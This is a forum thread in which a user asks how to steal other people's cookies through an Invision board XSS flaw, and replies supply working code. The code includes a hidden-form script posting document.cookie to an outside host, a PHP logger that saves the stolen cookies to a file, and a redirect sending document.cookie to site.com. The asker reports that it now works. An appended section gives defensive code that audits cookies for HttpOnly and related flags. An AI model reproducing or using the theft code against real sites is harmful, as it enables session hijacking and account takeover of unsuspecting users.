KarachiKing555
I was just curious how someone can get remote users' cookies! This vuln shows only your cookie, but I want some little hints on how one could get others' cookies! Have you set up the PHP script somewhere else and used some javascript:write function so that it sends the whole data to your site rather than popping it up?

Invision XSS Vul
ComSec
KarachiKing555... see my reply in the exploit section

regards
nuorder
Here's one I made in the early days; it's not perfect, but it's something to get you started.
QUOTE
document.write('<div style="visibility:hidden;"><iframe src="" name="vvv" width="1" height="1" frameborder="no"></iframe></div>')
document.write('<form name="f1" action="http://www.example.com/addstuff.asp" method="POST" target="vvv">');
document.write('<input type="hidden" name="cookiemonster" value="' + document.cookie + '"/>');
document.write('</form>');
document.forms[0].submit();


I seem to recall that I used this method rather than a straight iframe so it wouldn't show in the history as much.

You will need some form of SQL database to store these; using PHP to email them or write to a file is good too.
CereBrums
Well,
you can easily direct the cookie to another site
that will get the information and log it,
like so:
CODE
<?php
$text = $_GET['info'];
$filen = "log.txt";
$fo = fopen($filen, "a");
fputs($fo, "$text\r\n");

fclose($fo);
?>


The cookies will be saved in the file 'log.txt'.

The refer is being made using this cmd:
CODE
javascript:document.location("http://site.com/get.php?info=" + document.cookie);


The line
$text = $_GET['info']
gets the data received in the var 'info' from the URL...

Hope you got it.
KarachiKing555
Thanks a lot, Nuorder and Cerebrums! I got it working now!
d12boy420
thanks

BN says:
Bad start! Suspended 14 days for THANKS post.
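
Both scripts posted in this thread read `document.cookie`, and that string leaves out any cookie the server set with the HttpOnly attribute. As an added example (not part of any post above), this JavaScript audits Set-Cookie headers and reports which cookies page script could read; the sample headers and cookie names are constructed, and it assumes every cookie matches the page's path and domain.

```javascript
// Added example: audit Set-Cookie headers for cookies readable by page script.
// SAMPLE headers and cookie names below are constructed for illustration.

// Parse one Set-Cookie header value into { name, value, attrs }.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  if (eq < 1) return null; // no usable name=value pair: skipped by this audit
  // Attribute names are case-insensitive; keep only the name part.
  const attrs = new Set(rest.map((a) => a.split('=')[0].trim().toLowerCase()));
  return { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs };
}

// The string page script would get from document.cookie:
// cookies flagged HttpOnly are withheld from script by the browser.
function scriptVisible(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => c && !c.attrs.has('httponly'))
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// List each cookie that lacks a protective attribute, and which ones.
function audit(headers) {
  const findings = [];
  for (const c of headers.map(parseSetCookie)) {
    if (!c) continue;
    const missing = ['httponly', 'secure', 'samesite'].filter(
      (a) => !c.attrs.has(a)
    );
    if (missing.length) findings.push({ name: c.name, missing });
  }
  return findings;
}

// Constructed sample: one hardened session cookie, two weaker cookies.
const SAMPLE = [
  'session_id=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'member_id=42; Path=/',
  'theme=dark; Path=/; SameSite=Lax',
];

console.log('script-readable:', scriptVisible(SAMPLE));
console.log('findings:', JSON.stringify(audit(SAMPLE)));
```

Any session or login cookie that shows up in the script-readable string is one an injected script could read; setting HttpOnly on it keeps it out of `document.cookie`, though the underlying XSS still needs fixing with output encoding.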